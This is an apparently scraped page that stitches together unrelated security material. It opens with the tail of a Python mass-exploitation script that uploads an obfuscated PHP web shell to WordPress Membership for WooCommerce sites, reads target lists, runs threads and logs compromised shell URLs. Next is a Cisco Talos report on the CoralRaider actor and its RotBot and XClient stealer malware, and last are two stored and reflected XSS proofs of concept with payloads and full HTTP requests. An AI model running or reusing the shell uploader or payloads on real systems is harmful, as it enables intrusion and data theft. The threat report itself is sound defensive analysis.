</form></body></html><?PHPif(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echobase64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echobase64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>"""requests.urllib3.disable_warnings()def Exploit(Domain):    try:        if 'http' in Domain:          Domain = Domain        else:          Domain = 'http://'+Domain        myup = {'': ('db.php', uploader)}        req = requests.post(Domain +'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',files=myup, headers=headers,verify=False, timeout=10).text        req1 = requests.get(Domain +'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')        if 'Ex3ptionaL' in req1:          print (fg+'[+] '+ Domain + ' --> Shell Uploaded')          open('Shellz.txt', 'a').write(Domain +'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')        else:          print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')    except:        print(fr+' -| ' + Domain + ' --> {} [Failed]')target = open(input(fm+"Site List: "), "r").read().splitlines()mp = Pool(int(input(fm+"Threads: ")))mp.map(Exploit, target)mp.close()mp.join()

WordPress Membership For WooCommerce Shell Upload

Cisco Talos discovered a new threat actor we’re calling “CoralRaider” that we believe is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries.

**CoralRaider targets victims’ data and social media accounts**

Thursday, April 4, 2024 08:00

*   Cisco Talos discovered a new threat actor we’re calling “CoralRaider” that we believe is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. 
*   This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts.
*   They use RotBot, a customized variant of QuasarRAT, and XClient stealer as payloads in the campaign we analyzed.
*   The actor uses the dead drop technique, abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe 

**CoralRaider operators likely based in Vietnam **

Talos assesses with high confidence that the CoralRaider operators are based in Vietnam, based on the actor messages in their Telegram C2 bot channels and language preference in naming their bots, PDB strings, and other Vietnamese words hardcoded in their payload binaries. The actor’s IP address is located in Hanoi, Vietnam. 

 Our analysis revealed that the actor uses a Telegram bot, as a C2, to exfiltrate the victim’s data. This allowed us to collect information and uncover several invaluable indicators about the origin and activities of the attacker. 

The attacker used two Telegram bots: A “debug” bot for debugging, and an “online” bot where victim data was received. However, a Desktop image in the “debug” bot had a similar desktop and Telegram to the “online” bot. This showed that the actor possibly infected their own environment while testing the bot. 

Analyzing the images of the actor’s Desktop on the Telegram bot, we found a few Telegram groups in Vietnamese named “Kiém tien tử Facebook,” “Mua Bán Scan MINI,” and “Mua Bán Scan Meta.” Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded. 

In an image from the “debug bot,” we spotted the Windows device ID (HWID) and an IP address (118\[.\]71\[.\]64\[.\]18), located in Hanoi, Vietnam, that is likely to be CoralRaider’s IP address.

Talos’ research uncovered two other images that revealed a few folders on their OneDrive. One of the folders had a Vietnamese name, “Bot Export Chiến,” which is the same as one of the folders in the PDB strings of their loader component. Pivoting on the folder path in the PDB string, we discovered a few other PDB strings having similar paths but different Vietnamese names. We analyzed the discovered samples with the PDB strings and found they belong to the same loader family, RotBot. The Vietnamese name in the PDB string of the loader binary further strengthens our assessment that CoralRaider is of Vietnamese origin.

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Khuê\\14.225.210.XX-Khue-Ver 2.0\\GPT\\bin\\Debug\\spoolsv.pdb

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Trứ\\149.248.79.205 - NetFrame 4.5 Run Dll - 2024\\ChromeCrashServices\\obj\\Debug\\FirefoxCrashSevices.pdb

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Trứ\\139.99.23.9-NetFrame4.5-Ver2.0-Trứ\\GPT\\bin\\Debug\\spoolsv.pdb

  

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Chiến\\14.225.210.XX-Chiến -Ver 2.0\\GPT\\bin\\Debug\\spoolsv.pdb

  

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Trứ\\139.99.23.9-NetFrame4.5-Ver2.0-Trứ\\GPT\\bin\\Debug\\SkypeApp.pdb

  

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Chiến\\14.225.210.XX-Chiến -Ver 2.0\\GPT\\bin\\Debug\\spoolsv.pdb

  

D:\\ROT\\ROT\\ROT Ver 5.5\\Source\\Encrypted\\Ver 4.8 - Client Netframe 4.5\\XClient\\bin\\Debug\\AI.pdb

  

Another image we analyzed is an Excel spreadsheet that likely contained the victims’ data. We have redacted the images to maintain confidentiality. The spreadsheet has several tabs in Vietnamese, and their English translation showed us the tabs “Employee salary spreadsheet,” “advertising costs,” “website to buy copies,” “PayPal related,” and “can use.” The spreadsheet seemed to have multiple versions — the first was created on May 10, 2023. We also spotted that they have logged into their Microsoft Office 365 account with the display name “daloia krag” while accessing the spreadsheet, and CoralRaider likely operates the account. 

CoralRaider’s payload, XClient stealer analysis, showed us a few more indicators. CoralRaider had hardcoded Vietnamese words in several stealer functions of their payload XClient stealer. The stealer function maps the stolen victim’s information to hardcoded Vietnamese words and writes them to a text file on the victim machine’s temporary folder before exfiltration. One example function we observed is used to steal the victim’s Facebook Ads account that has hardcoded with Vietnamese words for Account rights, Threshold, Spent, Time Zone, and Date Created, etc.

**The campaign  **

Talos observed that CoralRaider is conducting a malicious campaign targeting victims in multiple countries in Asia and Southeast Asia, including India, China, South Korea, Bangladesh, Pakistan, Indonesia and Vietnam. 

The initial vector of the campaign is the Windows shortcut file. We are unclear on the technique the actor used to deliver the LNKs to the victims. Some of the shortcut file filenames that we observed during our analysis are:

*   자세한 비디오 및 이미지.lnk
*   設計內容+我的名片.lnk
*   run-dwnl-restart.lnk
*   index-write-upd.lnk
*   finals.lnk
*   manual.pdf.lnk
*   LoanDocs.lnk
*   DoctorReferral.lnk
*   your-award.pdf.lnk
*   Research.pdf.lnk
*   start-of-proccess.lnk
*   lan-onlineupd.lnk
*   refcount.lnk

We also discovered a few notable unique drive serial numbers from the metadata of the Windows Shortcut files:

*   A0B4-2B36
*   FA4C-C31D
*   94AA-CEFB
*   46F7-AF3B

The attack begins when a user opens a malicious Windows shortcut file, which downloads and executes an HTML application file (HTA) from an attacker-controlled download server. The HTA file executes an embedded obfuscated Visual Basic script. The malicious Visual Basic script executes an embedded PowerShell script in the memory, which decrypts and sequentially executes three other PowerShell scripts that perform anti-VM and anti-analysis checks, bypass the User Access Controls, disables the Windows and application notifications on the victim’s machine, and finally downloads and run the RotBot. 

RotBot, the QuasarRAT client variant, in its initial execution phase, performs several detection evasion checks on the victim machine and conducts system reconnaissance. RotBot then connects to a host on a legitimate domain, likely controlled by the threat actor, and downloads the configuration file for the RotBot to connect to the C2. CoralRaider uses the Telegram bot as the C2 channel in this campaign. 

After connecting to the Telegram C2, RotBot loads the payload XClient stealer onto the victim memory from its resource and runs its plugin program. The XClient stealer plugin performs anti-VM and anti-virus software checks on the victim's machine. It executes its functions to collect the victim's browser data, including cookies, stored credentials, and financial information such as credit card details. It also collects the victim’s data from social media accounts, including Facebook, Instagram, TikTok business ads, and YouTube. It also collects the application data from the Telegram desktop and Discord application on the victim's machine. The stealer plugin can capture screenshots of the victim’s desktop and save them as a PNG file in the victim's machine’s temporary folder. With PNG files, the stealer plugin dumps the collected victim’s data from the browser and social media accounts in a text file and creates a ZIP archive. The PNG and ZIP files are exfiltrated to the attacker's Telegram bot C2.

Infection flow diagram.

**RotBot loads and runs the payload  **

RotBot, a remote access tool (RAT) compiled on Jan. 9, 2024, is downloaded and runs on the victim machine disguised as a Printer Subsystem application “spoolsv.exe.” RotBot is a variant of the QuasarRAT client that the threat actor has customized and compiled for this campaign. 

During its initial execution, RotBot performs several checks on the victim’s machine to evade detection, including IP address, ASN number, and running processes of the victim’s machine. It performs reconnaissance of system data on the victim machine. It also configures the internet proxy on the victim machine by modifying the registry key: 

Software\\Microsoft\\Windows\\CurrentVersion\\Internet 

Settings with the values:

ProxyServer = 127.0.0.1:80

ProxyEnable = 1

We observed that RotBot discovered in this campaign creates mutex in the victim machine as the infection markers​​ using the hardcoded strings in the binary.

RotBot loads and runs the XClient stealer module from its resources and uses the configuration parameters for its Telegram C2 bot from the downloaded configuration file. 

The XClient stealer sample we analyzed in this campaign is a .Net executable compiled on Jan. 7, 2024. It has extensive information-stealing capability through its plugin module and various modules for performing remote administrative tasks. 

XClient stealer has three primary functions that help it to avoid the radar. First, it will do virtual environment evasion if the victim’s machine runs in VMware or VirtualBox. It also checks if a DLL called sbieDll.dll exists in the victim machine file system to detect if it runs in the Sandboxie environment. XClient stealer also checks if anti-virus software, including AVG, Avast, and Kaspersky, is running on the victim’s machine. 

After bypassing all the checking functions, the XClient stealer captures the victim’s machine screenshot, saves it with the “.png” extension in the victim’s temporary user profile folder, and sends it to C2 through the URL “/sendPhoto.” 

XClient stealer steals victims’ social media web application credentials, browser data, and financial information such as credit card details. It targets Chrome, Microsoft Edge, Opera, Brave, CocCoc, and Firefox browser data files through the absolute paths of the respective browser installation paths. It extracts the contents of the browser database to a text file in the victim’s profile local temporary folder. 

XClient stealer hijacks and steals various Facebook data from the victim’s Facebook account. It sets custom HTTP header metadata along with the victim’s stolen Facebook cookie, and the username sends requests to Facebook APIs through the URLs below.

It checks if the victim’s Facebook is a business or ads account and uses regular expressions to search for access\_token, assetID, and paymentAccountID. Using Facebook graph API, XClient attempts to collect an extensive list of information from the victim’s account, shown in the table below.

Entities

Value place holders

facebook\_pages

verification\_status, fan\_count, followers\_count, is\_owned, name, is\_published,is\_promotable, parent\_page, promotion\_eligible, has\_transitioned\_to\_new\_page\_experience, picture, roles

Adaccounts, businesses

name, permitted\_roles, can\_use\_extended\_credit, primary\_page, wo\_factor\_type, client\_ad\_accounts, verification\_status, id, created\_time, is\_disabled\_for\_integrity\_reasons, sharing\_eligibility\_status, allow\_page\_management\_in\_www, timezone\_id, timezone\_offset\_hours\_utc

owned\_ad\_accounts

id, currency, timezone\_offset\_hours\_utc, timezone\_name,adtrust\_dsl

Business\_users

name, account\_status, account\_id, owner\_business, created\_time, next\_bill\_date, currency, timezone\_name, timezone\_offset\_hours\_utc, business\_country\_code, disable\_reason, adspaymentcycle{threshold\_amount}, has\_extended\_credit, adtrust\_dsl, funding\_source\_details, balance, is\_prepay\_account, owner

XClient stealer also collects the financial information from the victims’ Facebook business and ads accounts.

Payment related entities

Value Place holders

pm\_credit\_card

display\_string, exp\_month, exp\_year, is\_verified

payment\_method\_direct\_debits

address, can\_verify, display\_string, s\_awaiting, is\_pending,

status

payment\_method\_paypal

email\_address

payment\_method\_tokens

Current\_balance, original\_balance, time\_expire, type

amount\_spent, userpermissions

user, role

 Using the graph API, XClient stealer retrieves victims’ account friend list details and pictures. 

XClient stealer also targets the victim’s Instagram account and YouTube accounts through the URLs and collects various information, including username, badge\_count, appID, accountSectionListRenderer, contents, title, data, actions, getMultiPageMenuAction, menu, multiPageMenuRenderer, sections and hasChannel. It collects the application data from the Telegram desktop and Discord application on the victim’s machine. XClient also collects the data from the victim’s TikTok business account and checks for business ads. 

Talos compiled the hardcoded HTTP request header metadata the XClient stealer uses in this campaign while retrieving the victim’s information from Facebook, Instagram, and YouTube accounts. 

Facebook

*   sec-ch-ua-mobile: ?0
    
*   sec-ch-ua-platform: \\"Windows\\"
    
*   sec-fetch-dest: document
    
*   sec-fetch-mode: navigate
    
*   sec-fetch-site: none
    
*   sec-fetch-user: ?1
    
*   upgrade-insecure-requests: 1
    
*   user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
    
*   sec-ch-ua: \\"Not?A\_Brand\\";v=\\"8\\", \\"Chromium\\";v=\\"108\\", \\"Google Chrome\\";v=\\"108\\"
    
*   sec-ch-ua-mobile: ?0
    

  

Instagram

*   Sec-Ch-Prefers-Color-Scheme: light
    
*   Sec-Ch-Ua: "Google Chrome"; v = "113", "Chromium"; v = "113", "Not-A.Brand"; v = "24"
    
*   Sec-Ch-Ua-Full-Version-List: "Google Chrome"; v = "113.0.5672.127", "Chromium"; v = "113.0.5672.127", "Not-A.Brand"; v = "24.0.0.0"
    
*   Sec-Ch-Ua-Mobile: ?0
    
*   Sec-Ch-Ua-Platform: "Windows"
    
*   Sec-Ch-Ua-Platform-Version: "10.0.0"
    
*   Sec-Fetch-Dest: document
    
*   Sec-Fetch-Mode: navigate
    
*   Sec-Fetch-Site: none
    
*   Sec-Fetch-User: ?1
    
*   Upgrade-Insecure-Requests: 1
    
*   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko) Chrome / 113.0.0.0 Safari / 537.36
    

  

Youtube

*   content-type: application/json
    
*   sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24"
    
*   sec-ch-ua-arch: "x86"
    
*   sec-ch-ua-bitness: "64"
    
*   sec-ch-ua-full-version: "113.0.5672.127"
    
*   sec-ch-ua-full-version-list: "Google Chrome";v="113.0.5672.127", "Chromium";v="113.0.5672.127", "Not-A.Brand";v="24.0.0.0"
    
*   sec-ch-ua-mobile: ?0
    
*   sec-ch-ua-model: ""
    
*   sec-ch-ua-platform: "Windows"
    
*   sec-ch-ua-platform-version: "10.0.0"
    
*   sec-ch-ua-wow64: ?0
    
*   sec-fetch-dest: empty
    
*   sec-fetch-mode: same-origin
    
*   user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
    
*   x-goog-authuser: 0
    
*   x-origin: https://www.youtube.com
    
*   x-youtube-bootstrap-logged-in: true
    
*   x-youtube-client-name: 1
    

Finally, the XClient stealer stores the victim’s social media data, which is collected into a text file in the local user profile temporary folder and creates a ZIP archive. The ZIP files were exfiltrated to the Telegram C2 through the URL “/sendDocument”.

Talos’ research of this campaign focused on discovering and disclosing a new threat actor of Vietnamese origin and their payloads. Additional technical details of the attack chain components of this campaign can be found in the report published by the researchers at QiAnXin Threat Intelligence Center. 

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SID for this threat is 63192.

ClamAV detections are also available for this threat:

Lnk.Downloader.CoralRaider-10024620-0

Html.Downloader.CoralRaider-10025101-0

Win.Trojan.RotBot-10024631-0

Win.Infostealer.XClient-10025106-2

**Indicators of Compromise**

Indicators of Compromise associated with this threat can be found here.

CoralRaider targets victims’ data and social media accounts

Workout Journal App version 1.0 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: Workout Journal App 1.0 - Stored XSS# Date: 12.01.2024# Exploit Author: MURAT CAGRI ALIS# Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html># Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Windows / MacOS / Linux# CVE : CVE-2024-24050# DescriptionInstall and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php urlFor the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code.# PoCRegister Request to /workout-journal/endpoints/add-user.phpPOST /workout-journal/endpoint/add-user.php HTTP/1.1Host: localhostContent-Length: 268Cache-Control: max-age=0sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/workout-journal/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vciConnection: closefirst_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456-This request turn back 200 Code on ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:05:52 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Content-Length: 214Connection: closeContent-Type: text/html; charset=UTF-8                <script>                    alert('Account Registered Successfully!');                    window.location.href = 'http://localhost/workout-journal/';                </script>After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right./workout-journal/home.php RequestGET /workout-journal/home.php HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://localhost/workout-journal/endpoint/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1Connection: close/workout-journal/home.php ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:07:56 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 2791Connection: closeContent-Type: text/html; charset=UTF-8    <!DOCTYPE html>    <html lang="en">    <head>        <meta charset="UTF-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <title>Workout Journal App</title>                <link rel="stylesheet" href="./assets/style.css">                <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">        <style>            body {                overflow: hidden;            }        </style>    </head>    <body>        <div class="main">            <nav class="navbar navbar-expand-lg navbar-dark bg-dark">                <a class="navbar-brand ml-3" href="#">Workout Journal App</a>                <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">                    <span class="navbar-toggler-icon"></span>                </button>                <div class="collapse navbar-collapse" id="navbarSupportedContent">                    <ul class="navbar-nav ml-auto">                    <li class="nav-item active">                        <a class="nav-link" href="./endpoint/logout.php">Log Out</a>                    </li>                </div>            </nav>            <div class="landing-page-container">                <div class="heading-container">                    <h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2>                    <p>What would you like to do today?</p>                </div>                <div class="select-option">                    <div class="read-journal" onclick="redirectToReadJournal()">                        <img src="./assets/read.jpg" alt="">                        <p>Read your past workout journals.</p>                    </div>                    <div class="write-journal" onclick="redirectToWriteJournal()">                        <img src="./assets/write.jpg" alt="">                        <p>Write your todays journal.</p>                    </div>                </div>            </div>        </div>                <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js"></script>                <script src="./assets/script.js"></script>    </body>    </html>

Workout Journal App 1.0 Cross Site Scripting

Bludit version 3.13.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Bludit 3.13.0 - Cross Site Scripting (XSS)#Exploit Author: Gökhan ŞENŞÜKÜR# Date: 29/02/2024# Vendor Homepage: https://www.bludit.com# Software Link: https://www.bludit.com/releases/bludit-3-13-0.zip# Version: bludit-3-13-0# Tested on: WindowsTECHNICAL DETAILS & POC========================================### Steps to reproduce1.⁠ ⁠Open page http://localhost:test/admin/;2.⁠ ⁠Enter username as `⁠ admin"><img src=x onerror=alert(1)> ⁠`3.⁠ ⁠U can see pop up### HTTP Request  ###POST /test/admin/ HTTP/1.1Host: localhostContent-Length: 139Cache-Control: max-age=0sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/admin/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BLUDIT-KEY=9951a5o12g66e4c9aill39ul4pConnection: closetokenCSRF=d39d816df2972798da8c5be0b0b944cfc5163938&username=%60%60admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%60%60&password=&save=

Tag

#webkit